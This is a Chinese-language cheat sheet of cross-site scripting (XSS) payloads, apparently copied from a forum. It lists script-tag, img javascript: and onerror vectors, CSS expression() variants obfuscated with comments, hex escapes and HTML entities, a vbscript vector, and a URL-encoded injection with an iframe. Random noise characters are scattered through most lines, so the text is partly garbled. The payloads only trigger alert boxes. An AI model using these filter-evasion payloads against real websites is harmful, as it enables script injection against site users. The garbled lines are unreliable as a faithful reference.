<script>alert("跨站")</script> (最常用)- y' x8 [* ~$ X/ s! ^
<img scr=javascript:alert("跨站")></img>. V8 _( Y7 B- J1 i
<img scr="javascript: alert(/跨站/)></img>
2 _7 R, A- Z# K- n {% a& o<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
, N1 p: N/ Y% @, I<img scr="#" onerror=alert(/跨站/)></img>
" ~0 d, O3 M6 @% j! Z; u+ u<img scr="#" style="xss:expression(alert(/xss/));"></img>
3 s/ _7 _8 `( M- e<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
; q2 B U! p( Z. T$ K8 a9 A$ k- W<img src=vbscript:msgbox ("xss")></img>
9 K2 {4 L* g# k. B<style> input {left:expression (alert('xss'))}</style>
@6 _: ^2 W( H O( g+ J<div style={left:expression (alert('xss'))}></div>8 D) Z: z7 i- B4 \
<div style={left:exp/* */ression (alert('xss'))}></div>4 Q: G9 H3 q4 H2 k6 @
<div style={left:\0065\0078ression (alert('xss'))}></div>8 ?# R" c# F* l) U; Y8 H- w3 q
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>* v/ K, P) X# f: w" W* C, c
unicode <div style="{left:expRessioN (alert('xss'))}">
4 s T8 M* Q1 K) I- @' h+ q! n J
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
8 a9 A, i( \3 X% Q |